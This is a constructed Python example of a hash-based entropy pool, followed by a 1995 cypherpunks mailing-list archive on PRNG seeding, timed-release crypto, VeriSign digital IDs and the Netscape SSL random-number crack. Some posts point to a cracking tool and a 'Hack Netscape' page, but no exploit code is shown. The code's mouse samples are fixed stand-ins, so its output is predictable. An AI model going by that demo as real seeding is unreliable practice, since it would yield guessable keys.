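# Assumed threshold: no output until this much entropy has been credited.
MIN_ENTROPY_BITS = 128.0


class HashedPool:
    """Entropy pool whose every output passes through a hash 'one-way trap'.

    Callers only ever see hash outputs, never the pool itself, so a value that
    Mallet legitimately receives does not let him work back to the pool or
    forward to the next value handed to Alice. Each entropy event is credited
    with a conservative bit estimate supplied by the caller.
    """

    def __init__(self) -> None:
        # Constructed fixed starting value; real code would also mix in
        # whatever the operating system can offer at start-up.
        self._pool = hashlib.sha256(b"constructed-initial-pool").digest()
        self._counter = 0
        self._entropy_bits = 0.0

    def add_event(self, data: bytes, est_bits: float) -> None:
        """Mix one entropy event into the pool; est_bits is the caller's
        conservative estimate of how unpredictable the event is."""
        self._pool = hashlib.sha256(b"mix" + self._pool + data).digest()
        self._entropy_bits = min(self._entropy_bits + est_bits, 256.0)

    def ready(self) -> bool:
        return self._entropy_bits >= MIN_ENTROPY_BITS

    def next_bytes(self) -> bytes:
        """Return 32 output bytes.

        The output is a hash over the pool and a counter, and the pool is then
        hashed forward, so this output reveals neither the pool nor any other
        output, and a later compromise of the pool cannot recover past outputs.
        """
        if not self.ready():
            raise RuntimeError("insufficient entropy collected")
        out = hashlib.sha256(
            b"out" + self._pool + struct.pack(">Q", self._counter)
        ).digest()
        self._counter += 1
        self._pool = hashlib.sha256(b"step" + self._pool).digest()
        return out

    def wipe(self) -> None:
        """Erase internal state before exit (as far as Python lets us)."""
        self._pool = b"\x00" * 32
        self._counter = 0
        self._entropy_bits = 0.0


def mouse_event(x: int, y: int, ticks: int) -> bytes:
    """Pack one mouse sample (screen position plus a timer tick) as bytes."""
    return struct.pack(">HHI", x, y, ticks)


# Constructed mouse samples standing in for what a window system would report.
# Each is credited with only 4 bits, so 32 of them must be mixed in before any
# output is allowed; 40 are provided here.
SAMPLE_MOUSE: List[Tuple[int, int, int]] = [
    (100 + 7 * i, 200 + 3 * (i % 5), 1000 + 2 * i) for i in range(40)
]


def pool_from_mouse(samples: List[Tuple[int, int, int]]) -> HashedPool:
    """Seed a pool from mouse samples, the approach Cryptdisk is said to use."""
    pool = HashedPool()
    for x, y, ticks in samples:
        pool.add_event(mouse_event(x, y, ticks), est_bits=4.0)
    return pool


def pool_from_clock_only(clock_reads: List[int]) -> HashedPool:
    """Seed only from clock reads, credited at 2 bits each.

    This mirrors the time-based seeding the thread criticises: the pool stays
    not-ready and next_bytes() refuses, rather than handing out values that
    anyone who can guess the clock could reproduce."""
    pool = HashedPool()
    for t in clock_reads:
        pool.add_event(struct.pack(">Q", t), est_bits=2.0)
    return pool


if __name__ == "__main__":
    good = pool_from_mouse(SAMPLE_MOUSE)
    print("mouse-seeded pool ready:", good.ready())
    print("first output:", good.next_bytes().hex())
    weak = pool_from_clock_only([811441583, 811441584, 811441585])
    print("clock-seeded pool ready:", weak.ready())
    good.wipe()
```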
From adam at homeport.org Mon Sep 18 13:42:07 1995
From: adam at homeport.org (Adam Shostack)
Date: Mon, 18 Sep 95 13:42:07 PDT
Subject: Good random seeds
Message-ID: <199509182042.QAA02146@homeport.org>

Since we can all see how badly time works, I'd like to point out that Will Price, author of the excellent Cryptdisk utility for the Mac, uses mouse movements to seed his PRNG. His code is available for a small fee, and I'd strongly suggest that people who need good, easy PRNs take a look at it, and also take a long look at RFC1750, randomness recommendations for security (or something like that.)

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
-Hume

From sdw at lig.net Mon Sep 18 14:46:49 1995
From: sdw at lig.net (Stephen D. Williams)
Date: Mon, 18 Sep 95 14:46:49 PDT
Subject: Time release crypto
Message-ID:

What minimal requirements would be needed to support encrypted packets/files that a holder could only decrypt after a certain date/time? (Time Escrow?)

Or a server that releases keys if a 'heartbeat' isn't or a trigger is received? (Escrow in the banking/legal sense.) (Video/sound recordings for security, opened at court's request, Ecash Escrow, missing persons)

The obvious is a server that releases keys periodically (and serves old keys at will). Is there any way to make this trustable? Multiple servers with shared (xor split, etc.) keys of some kind?

Design ideas?

Applications:
Gov. docs with expiration dates for privacy/secrecy.
Source code for projects (if a company folds, copyright expires, etc.).
Contract release to companies, public, etc. (15 minute stock data, agreements for commercial use initially, public/fair use later)

sdw
-- 
Stephen D.
Williams 25Feb1965 VW,OH (FBI ID)
sdw at lig.net http://www.lig.net/sdw
Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011
OO/Unix/Comm/NN ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W
Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95

From bdolan at use.usit.net Mon Sep 18 14:54:39 1995
From: bdolan at use.usit.net (Brad Dolan)
Date: Mon, 18 Sep 95 14:54:39 PDT
Subject: Code of Law ["Noise"]
In-Reply-To: <199509181837.LAA01709@Csli.Stanford.EDU>
Message-ID:

On Mon, 18 Sep 1995, Christian Wettergren wrote:

> | >"The basic idea behind the movement," says
> | >University of Oregon history professor Richard Brown, "is
> | >'popular sovereignty,' that people are above the law.
> | >These people are alienated from the legal system. To some
> | >extent it sounds like they're also trying to settle
> | >personal scores."
>
> I suddenly got very cold.
>
> I think the world has seen enough of 'revolutionary justice',
> both in the Soviet Union; there are some fascinating passages
> of Lenin about avoiding the bourgeois-invented 'justice' concept,
> and that the revolution was well 'above' that whole thing,
>
> and in Germany.
>
> And I guess in current China.
>
> When the people and the governing establishment have lost contact
> this much, you're in for trouble.
>
> (Ok, remember I'm a dumb Swede, who still happens to believe that
> State and People don't have to be enemies. And I do believe in a
> sensible dialog between different interest groups etc etc. Flame
> away, I'm just dumb anyway. ;-))
>
> /Christian
>

There has been much handwringing today over some poor guys out west who have been holding their own "common law courts," along with wonderment that they lack faith in the American justice system.

In the last year we've seen in the national news:

* FBI and BATF murdering, lying, & tampering with evidence. (Waco/ Ruby Ridge hearings / WTC bombing trial /etc.)
* Cops confiscating cash from citizens in Atlanta, and pocketing it.
* Cops fabricating evidence wholesale in Philadelphia.
* Cops admitting to beating people in LA.
* Cops from NYC having drunken riots in D.C.
* Cops from around D.C. beating a suspect - later found to be innocent - until he was comatose.
* Cops having a shootout - among themselves - in AZ.
* Cops raping and murdering in New Orleans.

In several of these cases, little or no punishment resulted.

A couple of local incidents, in Knoxville, TN:

* Several months ago, the local paper (Knoxville News-Sentinel) revealed that jailers at the city/county jail are in the habit of hanging prisoners by their wrists until their hands turn black. Those that are really disfavored are also forced to wear a vomit-filled hood. To my knowledge, no one has yet been taken to task for this.
* Knox medical examiner Randall Pedigo was found to be drugging and raping young boys. He pulled a gun on the cops and was shot. After recovering, he was allowed to plead guilty in return for a 1-year sentence at the penal farm.

The mayor of Knoxville, Victor Ashe, is active in the U.S. Conference of Mayors and has served as a spokesman for the organization. Presumably, he and they are untroubled by events like the above. I can't recall him - or them - so much as expressing concern.

The "angry white men" have just figured out what the angry black men have known for a long time: that the "justice system" in the US is a tool used by some to impose their will on others. It has little if anything to do with justice.

Is this radical right-wing rhetoric or is it Marxist? Or is it just a statement of fact?

What percentage of the population can think this way without the jury system failing? What percentage does think this way? Is that why we're hearing calls for the abolition of the jury system?

Tenuous crypto tie: Why would anyone trust these guys to hold our escrowed keys?
From Chris.Claborne at SanDiegoCA.ATTGIS.COM Mon Sep 18 15:14:59 1995
From: Chris.Claborne at SanDiegoCA.ATTGIS.COM (Chris Claborne)
Date: Mon, 18 Sep 95 15:14:59 PDT
Subject: VeriSign Introduces the First Digital ID Issuing Service
Message-ID: <9509181742.aa29912@ncrhub1.ATTGIS.COM>

-----BEGIN PGP SIGNED MESSAGE-----

I thought the following would be interesting. It looks similar to what SLED wanted to do. Would be interested to see what their method of verification is.

- -------------
[Begin forwarded message]

VeriSign Introduces the First Online Digital ID Issuing Service; Users Get Unique Digital IDs to meet the Security Needs of Commerce and Communications

REDWOOD CITY, Calif.--(BUSINESS WIRE)--Sept. 18, 1995--VeriSign today announced the World Wide Web's first Online Digital ID Issuing Service. Being released in conjunction with Netscape Navigator 2.0, this service will allow users to directly enroll and receive their own unique Digital IDs. VeriSign defined today the class structure of its Digital ID brand of public identification certificates, establishing four classes of identification to meet the varying security needs within different environments. The service will begin Beta testing in late October.

A company or a consumer will be able to get a unique Digital ID online through VeriSign's Online Digital ID Issuing Service located on the World Wide Web. A user can register for a non-commercial Class One Digital ID at no cost, or a commercial version for $6, through an online autoresponder. This unique Class One Digital ID is designed for casual World Wide Web browsing and secure e-mail and is used by Netscape Navigator 2.0 to allow users to communicate securely and identify themselves to other users, as well as merchants on the Internet.

"The Online digital ID Issuing Service was created to provide a one-step process for obtaining a Digital ID for our corporate and individual users," said Stratton Sclavos, President and CEO of VeriSign, Inc. "We are offering non-commercial users Class One Digital IDs at no cost to introduce the concepts of authentication and privacy to the market. We will also offer higher classes online using higher assurance policies. We believe Digital IDs will help everyone in the online community safely conduct their business or personal transactions over public and private networks."

Public identification certificates

Working closely with application developers, service providers and affiliates, VeriSign issues and manages multiple classes of Digital IDs supporting a wide range of public identification certificate-enabled products like Netscape Navigator 2.0. VeriSign's public identification certificates can be issued for individuals as well as entities such as merchant servers. These public identification certificates, categorized into four classes with escalating levels of identity assurance, can be obtained from VeriSign directly or through the Online Digital ID Issuing Service.

Class One Digital IDs: These IDs ensure the uniqueness of a name or e-mail address. Class One Digital IDs are primarily used for casual World Wide Web browsing and secure e-mail. VeriSign offers non-commercial Class One Digital IDs at no cost or VeriSign supported commercial versions for $6.

Class Two Digital IDs: These IDs provide a higher level of assurance regarding a person's identity by involving third-party proof of name, address and other personal information provided in the registration process. Class Two Digital IDs are primarily used for inter-company e-mail, online purchasing from electronic malls and online subscriptions.

Class Three Digital IDs: These IDs further raise the level of identity assurance by involving personal presence or registered credentials. Class Three Digital IDs are used primarily for transactions demanding a higher level of assurance of the identity of an individual.
Typical applications include electronic banking, large-sum purchases from electronic malls and membership-based online services. VeriSign additionally offers Class Three Digital IDs for electronic commerce servers such as Netscape's Commerce Server and Open Market's Secure WebServer.

Class Four Digital IDs: These IDs are for individuals and companies requiring a maximum level of identity assurance. To obtain these IDs, the individual and/or organizations they represent are more thoroughly investigated and personal presence is required. Typical applications include access to confidential information, authorization to trade financial securities, and access to corporate databases.

VeriSign is the only company 100% committed to the digital authentication market. Home banking, electronic payments, and subscription based services are some of the areas in which VeriSign is working, with clients that include NASA, TRW, Netscape and Apple. VeriSign's public identification certificates offer multiple levels of identity assurance. In addition, VeriSign is extending its certificate issuing technology to include the new X.509 version 3 format, which greatly expands the flexibility and capability of Digital IDs. Navigator 2.0 users will be the first customers to receive version 3 compatible Digital IDs. Being X.509 compliant, VeriSign can include authorization parameters in a Digital ID allowing both corporate and individual users to customize them according to their electronic commerce and communications needs. X.509 certificates are becoming the internationally recognized standard form of "I.D." on public and private networks.

Pricing and Availability

Netscape Navigator 2.0 users will be able to download Class One Digital IDs from VeriSign's new Online Digital ID Issuing Service on the World Wide Web beginning in late October. Non-commercial Class One Digital IDs will be offered at no cost, or if users desire a VeriSign supported commercial version, the cost is $6 annually.
Class Two Digital IDs are available for $12 annually. Class Three Digital IDs are available for an individual for $24 annually. Corporate site license discounts are available. Class Three Digital IDs for an entity such as a corporate server are available for $290 for the first Digital ID and $95 for additional IDs at the same site annually. To obtain pricing on Class Four Digital IDs users should contact VeriSign directly.

VeriSign, Inc.

VeriSign provides Digital ID products and services for the electronic commerce marketplace. VeriSign's Digital IDs play a key role in ensuring the privacy and authentication of electronic transactions and communications. VeriSign, founded in 1995 as a spin-off of RSA Data Security, is working with its investors including Ameritech and Visa International, and partners such as Netscape and Apple, to open the digital marketplace to all consumers. VeriSign's goal is to provide consumers with the confidence necessary to conduct electronic commerce worldwide. For more information, contact VeriSign at 415-508-1151, or visit their Web site at http://www.verisign.com.

Note to Editors: Copyright 1995 VeriSign, Inc. 100 Marine Parkway, Redwood City, CA 94065. All rights reserved. VeriSign is a service mark and trademark of VeriSign, Inc. Digital ID, Providing Driver License for the Information Superhighway and Certificate Issuing System are all trademarks of VeriSign, Inc. All other trademarks are properties of their respective owners.

CONTACT: VeriSign Inc., Web Augustine, 415/508-1151, web at verisign.com; or Niehaus Ryan Haller Public Relations, Marcos Sanchez, 415/615-7912, marcos at nrh.com

07:35 ET SEP 18, 1995

-----BEGIN PGP SIGNATURE-----
Version: 2.7.1

iQCVAwUBMF3nBFzvpSsKhLftAQHBSQP+PCmXw9P2EWjweTIWoT65BYKgmhnxZbx0
Ig0Zi7dVgFS+dIAxTnc23p4BBBapfZMrN2Ho/zhm7csPB4+XQ65y+vDVlDH8ehvA
d/b7gAtsE9tOe1YglNeeNaxba/xB2OuGN6XJHH2A8wojIPw7ALK66XMPJ6YGn24T
N7eychxo61A=
=xgjH
-----END PGP SIGNATURE-----

   ...   __o   ..
  ...  -\<,    Chris.Claborne at SanDiegoCA.ATTGIS.Com
 ...(*)/(*).   CI$: 76340.2422
               http://bordeaux.sandiegoca.attgis.com/
PGP Pub Key fingerprint = A8 FA 55 92 23 20 72 69 52 AB 64 CC C7 D9 4F CA
Avail on Pub Key server. PGP-encrypted e-mail welcome!

From rsalz at osf.org Mon Sep 18 16:06:45 1995
From: rsalz at osf.org (Rich Salz)
Date: Mon, 18 Sep 95 16:06:45 PDT
Subject: Netscape's random numbers
Message-ID: <9509182305.AA15954@sulphur.osf.org>

>It would be remarkably stupid for them to try to enforce the
>provision.

Perhaps, but that's secondary to the bad spin the media could end up having on it. Preventing that problem was a major point of my article, which discussed the media and netscape not at all.

/r$

From rsalz at osf.org Mon Sep 18 16:15:29 1995
From: rsalz at osf.org (Rich Salz)
Date: Mon, 18 Sep 95 16:15:29 PDT
Subject: Your name in print
Message-ID: <9509182315.AA16020@sulphur.osf.org>

>From owner-www-security at ns2.rutgers.edu Mon Sep 18 17:36:41 1995
Date: Mon, 18 Sep 95 09:26:23 PST
>From: "Prince, Cheryl"
Message-Id: <9508188114.AA811441583 at ccmail2.mfi.com>
To: www-security at ns2.rutgers.edu
Subject: security article

I am an editor
at a business technology publication and am currently researching a piece on network security at financial institutions as well as the feasibility of secure Internet transactions and banking on the world wide web. I will be interviewing individuals who can speak to these issues and can talk about whether the banking industry can in fact move much of its activity on line without risking the loss of billions of dollars to online theft and other related damage. If you are familiar with this subject matter and/or have any experience in the financial industry, please email me at: cprince at mfi.com Thanks, CJ Prince From sameer at c2.org Mon Sep 18 17:14:24 1995 From: sameer at c2.org (sameer) Date: Mon, 18 Sep 95 17:14:24 PDT Subject: unssl.c available for ftp (was: Netscape's random numbers) In-Reply-To: <43kkdu$8qa@calum.csclub.uwaterloo.ca> Message-ID: <199509190006.RAA28102@infinity.c2.org> Now available in /pub/cypherpunks/cryptanalysis Please do not export. -- sameer Voice: 510-601-9777 Network Administrator FAX: 510-601-9734 Community ConneXion: The NEXUS-Berkeley Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From tcmay at got.net Mon Sep 18 17:27:49 1995 From: tcmay at got.net (Timothy C. May) Date: Mon, 18 Sep 95 17:27:49 PDT Subject: Time release crypto Message-ID: At 10:16 PM 9/18/95, Stephen D. Williams wrote: >What minimal requirements would be needed to support encrypted packets/files >that a holder could only decrypt after a certain date/time? >(Time Escrow?) An interesting topic, of which there have been several discussions of in the past few years. A check of the archives will reveal dozens of articles. (My own archives contain more than 30 articles on this topic.) I'm not trying to squelch any debate. I would ordinarily respond to this thread, and write an article, but with all the archived articles, why bother? 
This last came up in a major way in June of 1994, with several articles posted by me, Eric Hughes, Eli Brandt, Peter Wayner, Russ Busdiecker, Karl Barrus, Blanc Weber, and all the Usual Suspects (but not Kiser Sose). I'll forward an article (below) I did in 1993 on timed-release crypto. --Tim May Date: Wed, 10 Feb 93 11:55:45 -0800 To: cypherpunks at toad.com From: tcmay at netcom.com (Timothy C. May) Subject: Timed-Release Crypto Cypherpunks, I want to share with you folks some preliminary ideas on "timed-release cryptographic protocols," that is, methods for sending encrypted messages into the future. These ideas need more work, but since I have recently mentioned them to Hal Finney, Max More, Mark Miller, and perhaps others, I guess it's time to say something here. Why would anyone want to send encrypted (sealed) messages into the future? 1. Foremost, to send money into the future, while protecting it in the meantime from seizure, taxation, etc. This might be of interest to cryonics folks who want to arrange for their own revival/reanimation at some time in the future. (Existing systems have relied on creating endowments, insurance contracts, trust funds, and the like. The trust of the agent is the means for sending funds into the future--clearly this agent could be compromised, raided, taxed, put out of business, etc. Though I am personally not a cryonics client, I began thinking about this problem in 1989 and talked it over with Phil Salin, who, ironically, is now himself in cryonic suspension.) 2. To fulfill contracts with long payoff dates. One might wish to deliver money at some future date, or to supply information at some future date. 3. "In the event of my death"-type messages, with guaranteed delivery of some message or text in the event that something happens (or, of course, that the message is not "countermanded" by the sender). 4. 
A software publisher might place source code in a timed-release escrow, agreeing to release the code in 10 years, for whatever reason. (Of course, he may lie, but that's another issue. Possibly the digital time-stamping work of Haber and Stornetta can be used.) I'm sure you can think of other uses. I argue that this timed-release message is a kind of cryptographic primitive...though it may be argued that it's just a variant of an ordinary message transmission, albeit one through time instead of through space. Diving right in, some approaches: A message is encrypted (standard public key means, though private key methods work the same way) and "sent out." Perhaps into a network of remailers or a Cuperman-style "pool" (BTW, my compliments to Miron C. for deploying such a thing...the first of many, I suspect). The encrypted message is just a "passive" item in this scheme...it stays encrypted, is available to all, etc. (in other words, the security of the message being time-released does not in any way depend on hiding the existence or location of the encrypted message, though of course it is important that the encrypted message be widely distributed and not explicitly advertised or tagged as being a timed-release message. (Detail note: Why not? Because some governments may see timed-release messages as automatically being tax-avoiding, cryonics-supporting, seditious, etc., messages and may attempt to hunt down and erase any such messages...perhaps via "hunter-killer crypto viruses" or somesuch.) Let us suppose the encrypted message is to be unlocked in 30 years. (It could also be when some recognized event occurs, such as a Mars landing or the death of the sender, or whatever...you'll see how this works). How can the decryption key be prevented from being used in the meantime? (To make this clear: both the encrypted message _and_ the decryption key are "in circulation" during all of those 30 years. 
Any scheme that relies on the sender himself keeping the decryption key "secret" for those 30 years is of course no fun at all...it's just what we have today and involves no new cryptographic primitives, just ordinary human-mediated secrecy.) But if the encrypted message and the decryption key are both in circulation for all of those 30 years, what's to keep someone from decrypting the message in _one_ year, for example? The answer: independent escrow agents who handle large volumes of messages and agree to hold them for various amounts of time. Because they have no idea of what's inside the encrypted messages they hold--and some may be "test" messages deposited deliberately by reputation-rating or credentialling agencies, such as "Consumers Crypto Guide"--and because their business is holding things in escrow, they will not generally open messages before the time specified. "Aha!," I hear you exclaim, "Tim's scheme depends solely on the trust of these escrow agents, and that's no different from depositing a sealed envelope with your friendly lawyer and asking him to promise not to peek." Here's how crypto and reputation-based systems make my scenario different (and stronger, I am arguing): - an ecology of many escrow services, many pools, many encrypted-message senders makes for a more robust system against subversion of any single agent. - no escrow agent knows what is contained in a sealed message, hence the temptation to peek is reduced. (A wrinkle: escrow agents, like remailers, will probably go to automatic hardware that is tamper-resistant (cf. discussion of tamper-resistant or tamper-responding modules in the Crypto Glossary distributed at the first physical Cypherpunks meeting and available in the archives). Thus, the hardware will automatically execute certain protocols and make peeking a pain.) 
- the best escrow agents (someday) may in turn increase security and their own reputations by in turn using secondary contracts, i.e., by contracting with _other_ escrow agents to seal parts or all of their messages. - what results is that the original message is scattered around in various publicly available locations (perhaps paid-for by dribbles of crypto-money from crypto escrow agents, but this is a detail easily worked out in various ways). The decryption key to the original message is itself broken up into several or many pieces and scattered to a network of "remailer"-like agents (they are essentially "remailers into the future," by agreeing as part of their protocol to hold messages for some amount of time). As time passes, these various messages (pieces, remember) are retrieved, forwarded, and generally bounced around the network. - some escrow agents may be just "fixed delay" nodes. For example, "Alice's Rest Stop" remailer node widely advertises that it will take in messages and simply delay them for some fixed time, e.g., for a year. For some fee based on message size. (Clearly the fixed time delay is a crufty approach, much less flexible than variable delays negotiated by the messages themselves, but it makes the idea clearer in some ways: a network of many such one-year delays could thus "send" a message into the future in one-year jumps.) (It is important to remember that these messages are "first-class objects," to borrow a phrase, and that all messages essentially look the same and have the same "rights" (Dean Tribble is probably barfing at my appropriation of object-oriented lingo, but it seems appropriate). That is, inspection of the bytes will not reveal to someone whether the message is a $2 message, a simple love letter, a business contract, a remailed item, a $100K cryonics payment, etc. 
Thus, the "authorities" cannot simply target some class of messages and ban them or launch "hunter-killer crypto viruses" against them, at least not without shutting down the whole system!) - the individual pieces may have instructions attached, such as "You will be paid 10 crypto credits if you hold me for one year and then decrypt me." (Not to belabor the point, but the means by which this "contract" can be enforced are that the escrow agents never know when they're being tested, when they're being monitored by rating services. This kind of "trust" is what allows ordinary deposit banks to work...their business is taking deposits and lending money, not repudiating the honest claims of customers.) - thus, I envision a swarm of messages being stored-and-forwarded in space and time, with an observer seeing only bits flowing around. Nobody except the original "launcher" (who needs to be fairly careful about the path he selects, about robustness against some fraction of the escrow/remailer agents going out of business, etc.) knows what's going on. - and as the end of the 30-year period approaches, to continue with the example I started with, the decryption key gets "reconstituted" in various ways (depends on what is desired, and how protocols evolve...I don't claim to have the details already worked out). For example, after 30 years the various messages stored in escrow accounts are forwarded separately to "The Immortalist Foundation," which may in fact be a digital pseudonym (as we have discussed so many times here). This entity puts the pieces together, sort of like combining the missing pieces of a text and reconstituting a genie or demon, and finds it can now unlock the original encrypted message. It finds, say, a million crypto credits, or the location of some physical treasure, or whatever. (Needless to say, there are some obvious questions about what long-term money will be stable, what banks will still exist after 30 years, and so on. 
I expect new forms of time deposits to evolve. Can the original sender be expected to know what will evolve before he seals his original message? Some obvious issues to work on--I never claimed it would be trivial, or static. One approach is to allow some human intervention, where an "investment agent" opens a digital money message, redeems it, and reinvests it in some new instrument. As usual, he would not know who the original investor was and would be "tested" by reputation-rating agencies. It _does_ get complicated, I know.) The Key Point: Messages sent into this network of remailers, escrow accounts, pools, and investment agents are untraceable to the sender and are generally unidentifiable. To break a single message involves breaking the entire system (or colluding with enough remailer nodes, as in any DC-Net sort of system). As with remailer networks, the expectation is that they will become sufficiently pervasive and trans-nationalized that breaking the entire system is just too painful and difficult (much the way the Net is already too pervasive to easily shut down, even if some uses of it are undesirable to various national authorities). Timed-release messages are objects that can be transmitted, encrypted, and can carry further instructions on where to mail them next, on how much digital money to pay to this next link, and various other instructions or protocols. (In other words, they are "agents" that can negotiate various contracts, for remailing, for storage, etc. Since they are "powerless" in a human sense, their security is provided by double-checks--perhaps by other agents who are watching and waiting--and by the general "shell-game" system of reputations, credentialling, and so on.) 
To make this scheme clearer in a simple way, I could publicly post an encrypted message to this list, or in one of the "pools," and then scatter the decryption key in several pieces with several members of this list, paying them $1 each to "hold" their piece for, say, a month. At the end of the month, they would fulfill their end of the bargain by forwarding the piece they hold to some public place or pool and the decryption key would be reconstituted (don't press me for exact details....PGP doesn't support this directly, but could). For robustness against loss of some of the messages, an n-out-of-m voting scheme could be used (e.g., any 5 of 8 pieces are sufficient to reconstruct the decryption key). The result is a message from the past, a timed-release message. I'm anxious to hear your comments. I think such a cryptographic primitive could be useful for a lot of purposes. -Tim May -- ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From tcmay at got.net Mon Sep 18 17:40:19 1995 From: tcmay at got.net (Timothy C. May) Date: Mon, 18 Sep 95 17:40:19 PDT Subject: Caribbean Internet Services? Message-ID: A brief note, though the hardship to the Caribbean islands will not be brief. St. Thomas, St. Croix, and other islands were hit extremely hard by hurricane Marilyn. Previous hurricanes, including Luis, also hit some of the islands. Power in St. Thomas may not be back for a year in some parts. The roads, sewers, power lines, phone system, etc. will likely have to be completely rebuilt. 
(Yes, there have been more hurricanes this year than in most years...not clear if it's just a Poisson fluctuation, or symptomatic of deeper weather pattern changes.) ObCypherpunks Relevance: A couple of past or current list members have nascent Internet plans in some of these islands. (I think one of them is way south, just off Venezuela.) I suspect "Caribbean Data Havens" and "Internet Sites" are further off than they were a few months ago. --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From ravage at einstein.ssz.com Mon Sep 18 17:49:58 1995 From: ravage at einstein.ssz.com (Jim Choate) Date: Mon, 18 Sep 95 17:49:58 PDT Subject: Caribbean Internet Services? (fwd) Message-ID: <199509190100.UAA00247@einstein.ssz.com> Forwarded message: > To: cypherpunks at toad.com > From: tcmay at got.net (Timothy C. May) > Subject: Caribbean Internet Services? > > A brief note, though the hardship to the Caribbean islands will not be brief. > St. Thomas, St. Croix, and other islands were hit extremely hard by > hurricane Marilyn. Previous hurricanes, including Luis, also hit some of > the islands. > > ObCypherpunks Relevance: A couple of past or current list members have > nascent Internet plans in some of these islands. (I think one of them is > way south, just off Venezuela.) > > I suspect "Caribbean Data Havens" and "Internet Sites" are further off than > they were a few months ago. > Satellite dishes and a steady supply of gasoline via a couple of tankers would make such an operation completely portable. 
A more ideal solution would be to moor a ship in international waters (wasn't some group wanting to do this for 'humanitarian' reasons or somesuch?). Jim Choate From perry at piermont.com Mon Sep 18 17:51:27 1995 From: perry at piermont.com (Perry E. Metzger) Date: Mon, 18 Sep 95 17:51:27 PDT Subject: Caribbean Internet Services? In-Reply-To: Message-ID: <199509190051.UAA01037@frankenstein.piermont.com> Timothy C. May writes: > Power in St. Thomas may not be back for a year in some parts. The roads, > sewers, power lines, phone system, etc. will likely have to be completely > rebuilt. [...] > I suspect "Caribbean Data Havens" and "Internet Sites" are further off than > they were a few months ago. Not really. I suspect that phone company co-location and using buried lines and your own generator would probably fix most problems if you were "serious" about doing such a thing. Perry From cman at communities.com Mon Sep 18 17:59:21 1995 From: cman at communities.com (Douglas Barnes) Date: Mon, 18 Sep 95 17:59:21 PDT Subject: Caribbean Internet Services? Message-ID: Actually, it just highlights the need to make sure one is relying on buried/underwater cables, as well as the importance of hurricane resistant architecture. Virtually all of the buildings destroyed would have been obviously unsuitable for locating important servers even before this recent reminder. Note that this is not an endorsement or a condemnation of "Libertaria in Cyberspace" or in any particular physical location. >I suspect "Caribbean Data Havens" and "Internet Sites" are further off than >they were a few months ago. > >--Tim May > >---------:---------:---------:---------:---------:---------:---------:---- >Timothy C. May | Crypto Anarchy: encryption, digital money, >tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero >Corralitos, CA | knowledge, reputations, information markets, >Higher Power: 2^756839 | black markets, collapse of governments. 
>"National borders are just speed bumps on the information superhighway." From jya at pipeline.com Mon Sep 18 18:10:08 1995 From: jya at pipeline.com (John Young) Date: Mon, 18 Sep 95 18:10:08 PDT Subject: NYT on Netscape SSL Crack Message-ID: <199509190110.VAA20649@pipe4.nyc.pipeline.com> WQXR, the New York Times radio station, just reported on the crack, citing Markoff's article tomorrow. Says Netscape plans a fix, perhaps as early as tomorrow. We'll get a late-night copy and post it. From rah at shipwright.com Mon Sep 18 18:11:11 1995 From: rah at shipwright.com (Robert Hettinga) Date: Mon, 18 Sep 95 18:11:11 PDT Subject: Vince Cate is Breathing ;-) Message-ID: I think I can be forgiven for sharing a little private mail interchange I just had with Vince Cate, the Anguillan ex-cypherpunk/technomad, who's digging out from under Hurricane Luis... Cheers, Bob Hettinga --- begin forwarded text Date: Mon, 18 Sep 1995 13:47:36 +24000 From: Vincent Cate Subject: Re: How are you doing? To: Robert Hettinga MIME-Version: 1.0 > I figure by now the phone lines might be up, though I had heard there was > only one line up on Anguilla the day after. > > Can we do anything here to help? I am not sure if my other mail made it. Ya, the roof blew off of the phone company and also the electric company. All the phone company could do was set up an inmarsat phone line and charge $60/min to make calls. Thanks. I can't think of anything I need. Unless you know who sells directional cell phone antennas. Thanks! -- Vince --- end forwarded text ----------------- Robert Hettinga (rah at shipwright.com) Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131 USA (617) 323-7923 "Reality is not optional." --Thomas Sowell >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From sameer at c2.org Mon Sep 18 18:11:50 1995 From: sameer at c2.org (sameer) Date: Mon, 18 Sep 95 18:11:50 PDT Subject: Hack Netscape! 
Message-ID: <199509190106.SAA02447@infinity.c2.org> The T-shirt isn't designed yet but I think the web page can take public consumption now. Check out http://www.c2.org/hacknetscape -- sameer Voice: 510-601-9777 Network Administrator FAX: 510-601-9734 Community ConneXion: The NEXUS-Berkeley Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From tedwards at Glue.umd.edu Mon Sep 18 19:10:21 1995 From: tedwards at Glue.umd.edu (Thomas Grant Edwards) Date: Mon, 18 Sep 95 19:10:21 PDT Subject: Hack Netscape! In-Reply-To: <199509190106.SAA02447@infinity.c2.org> Message-ID: On Mon, 18 Sep 1995, sameer wrote: > The T-shirt isn't designed yet but I think the web page can > take public consumption now. Check out http://www.c2.org/hacknetscape Heh, what about a shirt for the people who worked through keyspace for the second crack? ;) -Thomas From bret at bjohns.win.net Mon Sep 18 19:15:20 1995 From: bret at bjohns.win.net (Bret A. Johnson) Date: Mon, 18 Sep 95 19:15:20 PDT Subject: PGP for Linux 1.2.8 Message-ID: <1818@bjohns.win.net> Can anyone tell me where a version of PGP 2.62 can be found for Linux? I got one off of ftp.berkeley.edu (pgp262s.zip) and it (or I can not get it) to compile on my system.. Thanks... From sameer at c2.org Mon Sep 18 19:16:06 1995 From: sameer at c2.org (sameer) Date: Mon, 18 Sep 95 19:16:06 PDT Subject: COMMUNITY CONNEXION OFFERS REWARD FOR EXPOSING ENCRYPTION FLAWS Message-ID: <199509190211.TAA07099@infinity.c2.org> 